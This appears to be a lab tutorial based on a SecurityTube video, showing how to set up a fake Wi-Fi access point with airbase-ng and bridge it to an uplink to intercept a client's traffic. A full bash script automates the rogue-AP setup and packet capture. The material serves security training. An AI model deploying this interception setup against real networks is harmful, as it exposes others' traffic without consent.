Vivek’s video is here.
In the unencrypted man-in-the-middle attack, we deauthenticate the client from its regular AP and get it to reconnect to our own fake AP.
We can either connect the client to a new wired (or 3G) internet connection or we can connect back to the real AP.
In our setup we’re going to get our victim to connect to our fake AP, and then send the traffic out to the internet via a different access point.
We’ll use the Alfa card to create the fake AP, and the laptop’s built-in Wi-Fi card to connect to our other AP.
0. Set up your network card in VirtualBox/VMware; “NAT” is probably your best option.
1. Bring up eth0 in BackTrack
ifconfig eth0 up
2. Bring up an access point with SSID SecurityTube
ifconfig wlan0 up
airmon-ng start wlan0
iwconfig wlan0 channel 1
airbase-ng --essid SecurityTube mon0
3. Bridge the interfaces
Run this in a new terminal window:
ifconfig at0 up
brctl addbr mitm
brctl show    # shows the bridge, but with no interfaces added yet
brctl addif mitm eth0
brctl addif mitm at0
ifconfig eth0 0.0.0.0 up    # a bridge port must not hold an IP address of its own; the address goes on the bridge
ifconfig at0 0.0.0.0 up
If you run ifconfig, you’ll see the new bridge, mitm. Bring it up and give it an address:
ifconfig mitm up
dhclient3 mitm
The dhclient command gets an IP address for the bridge; with the NAT adapter, this comes from the VirtualBox DHCP server.
4. Go to the airbase-ng window. Connect a device to the fake network you created.
The device will get an IP address from VirtualBox, the same way the bridge did.
5. Open up Wireshark and start a capture on at0. Open a web page on your client.
You should see a lot of traffic in Wireshark, and the client should be able to load pages through the laptop’s internet connection.
Every packet the client sends or receives now has to pass through our bridge; there is no other path. That is a step up from passively sniffing cleartext: we are in the path and can act on the traffic, not just observe it.
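The whole procedure (steps 1 through 5) as one script, added here as an example; it is not from the original post or from the SecurityTube video. The interface names are assumptions matching the post (wlan0 for the Alfa card, eth0 for the VM’s NAT adapter, mitm for the bridge, at0 and mon0 as created by the aircrack tools), and the DRY_RUN switch is my own addition for reviewing the command sequence without root or wireless hardware. Unlike the bare steps above, it checks that the tools are present, waits for at0 to exist before bridging, and tears the bridge and monitor interface down again on exit so the VM gets its own NIC back.

```shell
#!/bin/bash
# Added example, not from the original post or the SecurityTube video.
# Assumed names: wlan0 = Alfa card, eth0 = VM NIC on VirtualBox NAT,
# mitm = bridge, SecurityTube on channel 1. DRY_RUN=1 prints the commands
# instead of running them (no root, no wireless card needed).
set -u

WLAN=${WLAN:-wlan0}        # Alfa card that will host the fake AP
UPLINK=${UPLINK:-eth0}     # VM NIC, NAT'd by VirtualBox
BRIDGE=${BRIDGE:-mitm}
ESSID=${ESSID:-SecurityTube}
CHANNEL=${CHANNEL:-1}
MON=mon0                   # created by airmon-ng
TAP=at0                    # created by airbase-ng
AP_PID=

run() {                    # print in dry-run mode, execute otherwise
    if [ -n "${DRY_RUN:-}" ]; then echo "$*"; else "$@"; fi
}

preflight() {
    # fail before touching any interface if a tool is missing or we are not root
    local t
    for t in airmon-ng airbase-ng brctl ifconfig dhclient3 tcpdump; do
        command -v "$t" >/dev/null 2>&1 || { echo "missing tool: $t" >&2; return 1; }
    done
    [ -n "${DRY_RUN:-}" ] || [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
}

start_fake_ap() {
    run ifconfig "$WLAN" up
    run airmon-ng start "$WLAN"
    # -e sets the ESSID, -c the channel; at0 only appears once airbase-ng runs
    if [ -n "${DRY_RUN:-}" ]; then
        run airbase-ng -e "$ESSID" -c "$CHANNEL" "$MON"
        return 0
    fi
    airbase-ng -e "$ESSID" -c "$CHANNEL" "$MON" >airbase.log 2>&1 &
    AP_PID=$!
    local i=0
    until ifconfig "$TAP" >/dev/null 2>&1; do
        sleep 1; i=$((i + 1))
        [ "$i" -lt 15 ] || { echo "$TAP never appeared, see airbase.log" >&2; return 1; }
    done
}

build_bridge() {
    # Bridge ports must not carry an IP address of their own; the address
    # belongs to the bridge. That is why eth0 and at0 are set to 0.0.0.0 and
    # dhclient3 is run on the bridge, not on eth0.
    run ifconfig "$TAP" up
    run brctl addbr "$BRIDGE"
    run brctl addif "$BRIDGE" "$UPLINK"
    run brctl addif "$BRIDGE" "$TAP"
    run ifconfig "$UPLINK" 0.0.0.0 up
    run ifconfig "$TAP" 0.0.0.0 up
    run ifconfig "$BRIDGE" up
    run dhclient3 "$BRIDGE"    # lease comes from VirtualBox's DHCP server
}

teardown() {
    # undo everything so the VM gets its own NIC and lease back
    trap - EXIT INT TERM
    [ -n "$AP_PID" ] && kill "$AP_PID" 2>/dev/null
    run ifconfig "$BRIDGE" down
    run brctl delif "$BRIDGE" "$TAP"
    run brctl delif "$BRIDGE" "$UPLINK"
    run brctl delbr "$BRIDGE"
    run airmon-ng stop "$MON"
    run dhclient3 "$UPLINK"
}

capture() {
    # the Wireshark step, but written to a pcap you can open afterwards
    run tcpdump -i "$TAP" -w "$1"
}

main() {
    preflight || return 1
    trap teardown EXIT INT TERM
    start_fake_ap || return 1
    build_bridge
    echo "fake AP '$ESSID' is up; associations are logged in airbase.log." >&2
    echo "Connect the victim, browse, then Ctrl-C to stop and tear down." >&2
    capture "$1"
}

# usage: ./mitm-ap.sh up [out.pcap]    or    ./mitm-ap.sh down (cleanup after an interrupted run)
case "${1:-}" in
    up)   main "${2:-mitm.pcap}" ;;
    down) teardown ;;
    *)    echo "usage: $0 up [out.pcap] | down" >&2 ;;
esac
```

Run it as root on BackTrack with `./mitm-ap.sh up`, connect the client to SecurityTube, and open the resulting pcap in Wireshark; `DRY_RUN=1 ./mitm-ap.sh up` just lists what would be executed, which is a quick way to check the interface names before touching anything.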